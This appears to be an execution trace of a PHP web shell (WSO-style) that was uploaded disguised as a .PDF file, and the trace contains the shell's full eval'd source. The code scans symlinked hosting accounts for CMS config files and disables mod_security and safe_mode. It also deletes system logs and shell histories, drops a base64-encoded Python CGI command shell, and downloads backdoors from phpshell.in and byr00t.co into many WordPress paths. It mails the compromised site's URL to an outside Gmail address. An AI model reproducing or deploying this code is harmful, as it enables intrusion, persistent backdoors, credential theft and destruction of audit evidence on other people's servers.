$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n' /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code 1 0
4 13 0 0.008003 1143856 base64_decode 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4 13 1 0.008024 1143944
4 13 R 'http://byr00t.co/l-'
4 14 0 0.008041 1143912 GetIP 1 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code 16 0
